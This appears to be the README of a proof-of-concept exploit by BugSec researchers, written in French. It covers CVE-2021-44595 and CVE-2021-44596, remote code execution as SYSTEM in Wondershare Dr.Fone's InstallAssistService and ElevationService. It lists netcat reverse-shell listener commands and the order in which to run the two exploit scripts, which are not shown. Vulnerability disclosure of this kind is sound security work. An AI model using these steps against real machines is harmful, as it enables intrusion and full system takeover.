
Exploit de preuve de concept pour CVE-2021-44595 et CVE-2021-44596 dans Wondershare Dr.Fone, permettant une exécution de code à distance en tant que SYSTEM via des services vulnérables.
Netanel Cohen et Tomer Peled, chercheurs en sécurité chez BugSec.
Exemple de POC pour exploiter Wondershare Dr.Fone .
Dr.Fone est une boîte à outils pour téléphone développée par wondershare, et vulnérable à une RCE.
Avec uniquement un accès réseau, nous parvenons à exécuter du code à distance en tant qu'utilisateur SYSTEM.
Services vulnérables :
InstallAssistService.exe
ElevationService.exe
Testé sur les versions : 12.0.7, 11.4
Modifiez l'IP et le port, puis exécutez.
stty raw -echo; (stty size; cat) | nc -lvnp 1338
./ElevationServiceRCE.py
nc -lvnp 1337
./InstallAssistServiceRCE.py